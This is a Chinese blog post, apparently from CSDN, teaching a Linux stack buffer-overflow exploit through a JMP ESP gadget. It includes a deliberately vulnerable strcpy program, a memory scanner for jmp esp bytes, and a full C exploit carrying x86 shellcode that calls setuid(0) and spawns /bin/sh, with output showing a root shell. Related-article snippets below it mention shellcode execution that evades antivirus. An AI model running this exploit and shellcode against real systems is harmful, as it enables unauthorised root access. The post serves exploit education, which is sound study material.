利用JMPESP执行shellcode

最新推荐文章于 2022-02-25 20:00:37 发布
最新推荐文章于 2022-02-25 20:00:37 发布
阅读量786 收藏 1
点赞数
文章标签: Linux C C++ C# Windows

利用JMPESP执行shellcode

1. 前言.
Linux下面Buffer overflow中利用跳转到堆栈中的shellcode用的比较多, windows下面利用JMP ESP跳转的比较多, 本文没有什么技术新意,不过是突发奇想, 改变一下我自己以往的方法而已.
2. 比较.
经常使用的跳转到堆栈的shellcode方法有很好的一面, 比如可以把shellcode放到ENV里面, 这样可以逃避长度的限制. 缺点是这个计算麻烦,增大NOP是个不错的选择. Jmp esp也是个不错的选择哦, 这样可以不用知道shellcode的具体位置了.
3. 看看怎么回事吧.
有问题的程序:
[netconf@linux1 test]$ cat vul.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int foo(char *s1)
{
char buffer[20];
memset(buffer,0,20);
strcpy(buffer,s1);
printf("input:%s\r\n",buffer);
return 0;
}

main(int argc,char **argv)
{

if(argc<2)
{
printf("Usage:%s <string>\n",argv[0]);
exit(0);
}
foo(argv[1]);
exit(0);
}
很普通的一个buffer overflow.
堆栈结构如下所示:
|AAAA…………….A| 其他内容 | ebp | eip |
溢出后, 一般是这样的:
|AAAAAA………...A…….AAAAAAAA|shellcode地址|
利用shellcode地址替换掉保存的eip值
利用jmp esp的堆栈结构:
|AAAAAAAAAAAAAAAAAAAAAA|jmp esp addr|shellcode
用jmp esp addr来覆盖eip,这样当程序执行eip的时候, 会执行jmp esp指令, 这个时候esp已经是我们存放shellcode的地址了, 这样的精确性就大大提高了,而且不用多余的NOP来覆盖.
首先, 我们需要一个地址,这个地址的内容的汇编代码应该是jmp esp , 我们需要写一个小程序来获得我们所需要的地址:
[netconf@linux1 test]$ cat findesp.c
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
unsigned int i=0x4211cc79;
unsigned int a=0;
unsigned char *p;
void de(int j)
{
printf("\r\nGot SIGSEGV:");
printf("%p\r\n",p+a);
a++;
exit(0);
}
main()
{
p=(unsigned char *)i;
signal(SIGSEGV,de);
foo();
}
int foo()
{
while((unsigned int)p+a<0xbfffffff)
{
fflush(stdout);
if((*(p+a)==0xff) && (*(p+a+1)==0xe4))
{
printf("found it!!,p addr:%p\n",p+a);
a+=2;
foo();
}
a++;
}
exit(0);
}
运行一下:
[netconf@linux1 test]$ ./findesp
found it!!,p addr:0x4211ccf7
found it!!,p addr:0x4211dd5b
found it!!,p addr:0x4211dee7
found it!!,p addr:0x4211e15f
found it!!,p addr:0x4211e59f
found it!!,p addr:0x42125aa3
found it!!,p addr:0x42125c13

Got SIGSEGV:0x4212f000
[netconf@linux1 test]$
不错吧, 得到了很多个满足条件的地址, 我们随便选一个, 只要不带0x00就好.
这样我们可以写出这样一个exploit:
[netconf@linux1 test]$ cat exp.c
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <error.h>

#define JMPESP 0x42125aa3

char progname[]="./vul";
char shellcode[]=
"\x31\xdb\x31\xc9\x31\xd2\x31\xc0\xb0\xa4\xcd\x80"
"\x89\xd8\xb0\x17\xcd\x80"
"\x31\xc0\x50\x50\xb0\xb5\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

main(int argc,char **argv)
{
char buffer[1024];
int num=44,i=0;

memset(buffer,0,1024);
memset(buffer,'A',num);
buffer[num++]=JMPESP & 0xff;
buffer[num++]=(JMPESP>>8) & 0xff;
buffer[num++]=(JMPESP>>16) & 0xff;
buffer[num++]=(JMPESP>>24) & 0xff;
memcpy(buffer+num,shellcode,sizeof(shellcode));
execl(progname,progname,buffer,NULL);
}
是不是很短的程序?
[netconf@linux1 test]$ ./exp
……………………
. 蛝1蹓谸蛝柢/bin/sh
sh-2.05b#
轻松搞定.

iteye_3619
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
jmpesp.rar_jmpesp_jmp漏洞
09-21
jmpesp溢出漏洞编程的,需要寻找出错处理的地址,这代码就是搜索esp地址的,不知道哪里下的了
栈溢出利用-----jmp esp
qq_41683305的博客
02-14 958
通过jmp esp利用栈溢出,首先我们要找出jmp esp 的地址,因为系统不同,通用jmp esp的地址可能不同,下面的代码是找出jmp esp的地址的: #include<windows.h> #include<iostream.h> #include<tchar.h> int main() { int nRetCode=0; bool we_load_i...
jmp esp 为跳板的shellcode开发
##
11-25 1万+
0x00 Shellcode概述 Shellcode与exploit 1) shellcode:缓冲区攻击植入进程的代码。进行删改文件、窃取数据、上传木马并运行、格式话硬盘等。用汇编语言编写,并转换成二进制机器码,内容和长度受到苛刻限制。 2) exploit: 漏洞利用程序,用于生成攻击性的网络数据包或其他形式的攻击性输入。exploit的核心是淹没返回地址,劫持进程控制权,跳去执行shel
JMP ESP =>SEH(CALL EBX)
Yatere的天平秤
01-23 1565
首先你要知道怎么利用JMP ESP的方式 其利用格式是ORS,这里O=NOP,R=RET(jmp esp的地址),S=ShellCode。就是把缓冲区一直覆盖成NOP(空指令,什么都不做),直到原来的EIP位置时,J JMP ESP,紧跟后面才是我们的ShellCode。  这种方式执行ShellCode的原理:正常情况下,函数返回时,RET,等于POP EIP,即回复原来PUSH的EIP
[BUUCTF]PWN——x_ctf_b0verfl0w(汇编代码写shellcode+jump esp指令劫持esp
mcmuyanga的博客
02-04 1163
x_ctf_b0verfl0w 附件 步骤 例行检查,32位程序,开启了RELRO(不可改写got表) 本地试运行一下程序,看看大概的情况 32位ida载入 fgets可以溢出,但是只可以溢出0x32-0x20-0x4=14字节,由于没有开启nx,首先想到的是shellcode,0x20肯定放不进pwntools生成的shellcode,只能自己手写,但是得想办法劫持esp执行我们的shellcode 在hit函数找到了jump esp的gadget 因此我们可以构造这样的栈
轻松将jmp esp方式 改写为jmp ebx方式
要饭's Blog
06-16 3281
转载:Q版黑客溢出教程一书写这篇文章,希望能给想我一样的初学缓冲区溢出的菜鸟一些帮助,因为到现在的确还没找到介绍这类的文章。首先,介绍在堆栈溢出,我们的两种利用方式—jmp espjmp ebx;接下来,说明了其转化的简单方法;最后给了两个实际例子,将isno写的.printer利用代码和flashsky写的RPC利用代码改写成jmp ebx的方式,以实现对win2000 sp0-sp4全版本
JMPESP.rar_jmp_jmp esp_jmp9.02 crack_shellcode_sp3 jmp esp
最新发布
09-24
获取jmp esp地址程序,shellcode编写需要用到
find_esp.zip
04-10
寻找系统dlljmp esp和call esp指令地址。直接运行后,输入想要找的dll后,会显示出所有找到的jmp esp和call esp指令地址。
通过js/vbs实现shellcode免杀无文件执行
m0_46059204的博客
05-11 1098
通过利用CACTUSTORCH实现调用vbs或cscript.exe的方式实现shellcode和加载器的分离。shellcode运行进程通过js混淆隐藏,并通过调用ActiveX方式调用.NET的库,达成无文件落地状态执行的目的。 目前CACTUSTORCH原始加载器已不免杀,我们通过重新编译一份加载器方式更改特征绕过。 function base64ToStream(b) { var enc = new ActiveXObject("System.Text.ASCIIEncoding"); var
栈溢出 利用jmp esp绕过栈帧移位
Misaka10046的博客
09-16 536
实验代码 #include<stdio.h> #include<windows.h> #define PASSWORD "1234567" int verify_password(char *password) { int authenticated; char buffer[44]; authenticated = strcmp(password,PASSWORD); strcpy(buffer,password);//overflowed return authenti
Windows Shellcode学习笔记——栈溢出jmp esp利用与优化
weixin_33787529的博客
09-20 507
本文讲的是Windows Shellcode学习笔记——栈溢出jmp esp利用与优化, 0x00 前言 在《Windows Shellcode学习笔记——shellcode在栈溢出利用与优化》对栈溢出的利用做了介绍。通过将返回地址覆盖为shellcode在内存的起始地址,实现对栈溢出的利用 但是shellcode在内存的起始地址往往不...
栈溢出学习(二)之 jmp esp & return2libc
Pz_mstr's Blog
03-22 2913
前言 栈溢出学习(二),针对一个例子,进行各种栈溢出技术的练习。本文内容承接栈溢出学习(一) 本文属于新手实验难度,过程比较详细,适合新手学习 样例代码 本文使用的代码如下 #include <stdio.h> #include <stdlib.h> #include <string.h> /* * compiled with: * gcc -...
软件安全实验——lab6(缓冲区溢出2:使用jmp esp或者call esp方法和修改函数指针)
Onlyone_1314的博客
07-30 938
目录标题Task 1第一步:打开内存地址随机化第二步:编译上面的程序为Set-UID程序,注意加上-fno-stack-protector进行编译第三步:bof的返回地址第四步:确定缓冲区的位置第五步:返回地址和缓冲区之间的距离Task 2第一步:打开内存地址随机化第二步:编译上面的程序为Set-UID程序,注意加上-fno-stack-protector进行编译第三步:strcpy函数的返回地址第四步:hmm函数的地址第五步:攻击 Task 1 下面的程序具有缓冲区溢出,利用jmp esp或者call e
Unity 【Content Size Fitter】- 聊天气泡自动适配Text文本框大小
当代野生程序猿
02-25 5293
通常在展示人物对话的时候文本的长度是不定的,因此会需要动态的调整对话内容文本框的背景图片的大小,这里以如下这种气泡框的对话为例: 实现该需求涉及到的内容包括Content Size Fitter组件的使用、2D Sprite工具包的使用。 Content Size Fitter组件用于Text文本框,如图所示,我们将Horzontal Fit设为Preferred Size,当我们调整Text文本框的内容时,其大小会自动进行调整。 注意Rect TransformPivot轴心点的设置
新唐NUC972 Linux(一):USB烧写linux出厂镜像
小破孩的博客
02-20 2941
USB烧写出厂镜像 文章目录USB烧写出厂镜像前言一、硬件连接二、安装驱动三、烧写linux程序四、运行程序 前言 今天开始进军linux,学了那么久单片机,也摸得七七八八,至少点个灯还是会的。本人之所以买酷客的linux开发板主要是便宜,资料也算齐全,虽然没有原子那么好,不过也够了,找那么多借口,其实就是qiong。今天先从USB烧录官方提供的linux相关程序到芯片开始吧。 一、硬件连接 1、连接电源线 2、RS232转USB,需要安装CH340驱动,用于在电脑串口超级终端查看调试信息。 3、U
WeChall CTF Writeup(一)
weixin_43211186的博客
02-25 1188
以下题目标题组成: [Score] [Title] [Author] 文章目录0x01 1 Training: Get Sourced by Gizmore0x02 1 Training: Stegano I by Gizmore0x03 1 Training: Crypto - Caesar I by Gizmore0x04 1 Training: WWW-Robots by Gizmore0x05 1 Training: ASCII by Gizmore 0x01 1 Training: Get Sou
C语言每日一练——第126天:佩奇借书问题
热门推荐
Edison's 小宇宙
02-25 2万+
史上最强借书方案问题讲解(代码详解+思路分析+动图演示+特性总结)
CS5261与CS5265功能应用|CS5261替代RTD2171|CS5265替代RTD2172
qq1659747718的博客
02-25 1108
CS5261可以完全替代兼容停产RTD2171,CS5265可以完全替代兼容RTD2172,芯片单价低,整体方案设计简单,整体BOM成本较RTD2171、RTD2172低。
Hello Kafka(八)——Confluent Kafka简介
天山老妖
02-24 8570
一、Confluent Kafka简介 1、Confluent Kafka简介 2014年,Kafka的创始人Jay Kreps、NahaNarkhede和饶军离开LinkedIn创立Confluent公司,专注于提供基于Kafka的企业级流处理解决方案,并发布了Confluent Kafka。Confluent Kafka分为开源版和企业版,企业版收费。 2、Confluent Kafka特性 Confluent Kafka开源版特性如下: (1)Confluent Kafka Connecto
基于System Verilog的同步FIFO实现(一)
qq_40268672的博客
02-22 2870
FIFO,全称First In First Out,它是数字电路设计一个重要的基本单元,它分为同步FIFO和异步FIFO,所谓同步FIFO,是指读写都是在同一个时钟的驱动下进行的,而异步FIFO读写操作的时钟是分离的,本文主要讲述同步FIFO的实现。 如图,是同步FIFO的一个示意图,它由clk,rst,wr_en,rd_en,full,empty,rdata,wdata等信号构成,其,full,empty用于指示fifo的状态(空或满),wr_en,rd_en分别为写使能和读使能信号,在FIFO的设

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值